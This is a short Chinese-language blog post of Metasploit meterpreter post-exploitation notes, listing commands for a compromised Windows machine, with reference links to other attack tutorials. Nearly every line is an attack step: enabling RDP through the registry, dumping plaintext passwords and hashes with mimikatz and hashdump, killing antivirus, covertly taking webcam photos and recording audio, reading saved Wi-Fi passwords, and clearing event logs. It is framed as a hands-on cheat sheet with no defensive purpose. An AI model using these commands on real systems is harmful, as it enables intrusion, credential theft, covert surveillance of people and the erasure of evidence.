MSF 内网渗透笔记

时间:2021-10-31 12:28:56

进入meterpreter模式

在meterpreter中输入shell即可进入CMD窗口
接着即可执行CMD命令,例如打开RDP服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

meterpreter模式

1、输入screenshot截个图看看主人在干什么吧。

MSF 内网渗透笔记

2、wdigest //抓取明文密码(需加载mimikatz模块)

MSF 内网渗透笔记

3、bgrun killav //杀掉杀毒软件

MSF 内网渗透笔记

4、webcam_list //查看有没有摄像头

bgrun webcam //启动摄像头

webcam_snap -i 1 -v false //启动摄像头拍摄一张照片但不打开闪光灯

bgrun sound_recorder //启动声音录制

MSF 内网渗透笔记

5、bgrun hashdump //获取哈希值

MSF 内网渗透笔记

6、clearev //清除日志

MSF 内网渗透笔记

7、bgrun post/windows/wlan/wlan_profile //读取无线连接的账号密码

MSF 内网渗透笔记

此处执行失败换一种方式

在cmdshell下执行netsh wlan show profiles

MSF 内网渗透笔记

MSF 内网渗透笔记

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

MSF 内网渗透笔记

参考链接:

https://www.bodkin.ren/index.php/category/Tricks/

使用 MSF 路由转发实现MSF框架的内网渗透

https://www.anquanke.com/post/id/86505

MSF框架实现“永恒之蓝”的闪电攻击

https://www.anquanke.com/post/id/86245